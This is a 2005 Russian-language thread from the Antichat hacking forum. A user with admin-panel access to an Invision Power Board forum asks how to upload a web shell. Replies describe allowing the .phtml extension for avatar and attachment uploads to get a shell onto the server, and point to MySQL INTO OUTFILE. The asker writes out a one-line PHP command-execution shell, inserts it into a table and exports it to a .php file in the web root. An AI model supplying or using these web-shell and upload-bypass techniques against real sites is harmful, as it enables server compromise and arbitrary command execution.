HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлом ipb через админку
  #1  
Старый 09.12.2005, 02:04
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами: 10753243

Репутация: 1
Arrow Взлом ipb через админку

Честно и старательно провел 20 минут в поисках похожих тем, но ничего полезного не нашел.

Есть нормальный доступ к админской панели, нужно всего лишь залить шелл на сайт. Uploads доступен на запись, закачать в папку со смайлами удается, но прочитать - нет(АшиПка 500).

Я читал эту статью, но тамошний вариант с подменой запроса не работает - файл не передается. Прошу помочь. Устроит любой вариант, главное - шелл залить.
 
Ответить с цитированием

  #2  
Старый 09.12.2005, 19:09
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
С нами: 11217926

Репутация: 726
По умолчанию

Какой версии форум?
 
Ответить с цитированием

  #3  
Старый 09.12.2005, 22:11
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

 
Ответить с цитированием

  #4  
Старый 10.12.2005, 01:55
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами: 10753243

Репутация: 1
По умолчанию

to Barsik
ipb 1.3 final


to Green_Bear
Попробовал как ты написал. Результат:
Цитата:
запрещено загружать файлы такого типа, в качестве аватаров или фотографий

Последний раз редактировалось fixer2; 10.12.2005 в 02:07..
 
Ответить с цитированием

  #5  
Старый 10.12.2005, 04:49
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами: 10753243

Репутация: 1
По умолчанию

Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.

Последний раз редактировалось fixer2; 10.12.2005 в 05:49..
 
Ответить с цитированием

  #6  
Старый 10.12.2005, 22:09
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
С нами: 11212166

Репутация: 182


По умолчанию

Цитата:
Ахтунг! В админке можно исполнять mysql команды. Знаю что можно с их помощью создать свой шелл, но в мускуле не разбираюсь. Прошу помочь.
Юзай поиск тема обсуждалась( into outfile)
Если вопрос не закрыт то иди сюда(лучшие доки) - http://dev.mysql.com/doc/
 
Ответить с цитированием

  #7  
Старый 10.12.2005, 23:11
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами: 10840706

Репутация: 547


По умолчанию

Делай так: Если форум IPB 2 0 4.

Зайди в Админку,

Системные настройки---->Главная конфигурация---->Профили пользователей---->Разрешенные расширения файлов для аватар.

Ставиш разширение phtml.

Это тоже самое что и php, потом идёш в Аттачи и делаеш тама ешё один тип-.phtml, тип пишем от пхп файлов, то есть application/octet-stream после всего это идёш и грузиш свой шелл , только с изменёным разширением в phtml, потом смотриш его свойства вот и всё, можна сказать я тебе на пальчиках всё обяснил,вчера темже способом Грин для меня шелл закинул.

Если я помог тебе не забудь про репутацию Грину и мне.

Респект Грину за выложеную инфу.

Последний раз редактировалось Tem; 10.12.2005 в 23:18..
 
Ответить с цитированием

  #8  
Старый 11.12.2005, 03:06
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами: 10753243

Репутация: 1
По умолчанию

to Tem
Читай топ внимательнее.

to qBiN
Спасибо за инфу, но все равно пока не получается...

Последний раз редактировалось fixer2; 11.12.2005 в 08:18..
 
Ответить с цитированием

  #9  
Старый 11.12.2005, 08:22
fixer2
Новичок
Регистрация: 05.12.2005
Сообщений: 17
С нами: 10753243

Репутация: 1
По умолчанию

Значит прочел-таки я это небольшое пособие. Как выяснилось - в мускуле сложных команд нету. Тем не менее залить шелл не удается.

Сначала я собственно создал значение в таблице юзеров:
Цитата:
INSERT INTO table (par1, par2) VALUES ('7777','<? system($_GET["cmd"]); ?> ')
Теперь инто файл хочу его залить:
Цитата:
SELECТ name FROM table INTO OUTFILE '/home/user/www/shell.php'
Но, увы, не получается. В ответ вижу следующее сообщение:

Цитата:
Access denied for user: 'forum@localhost' (Using password: YES)
Это означает что инто аутфайл запрещен? Какие тогда варианты есть?

Последний раз редактировалось fixer2; 11.12.2005 в 08:35..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.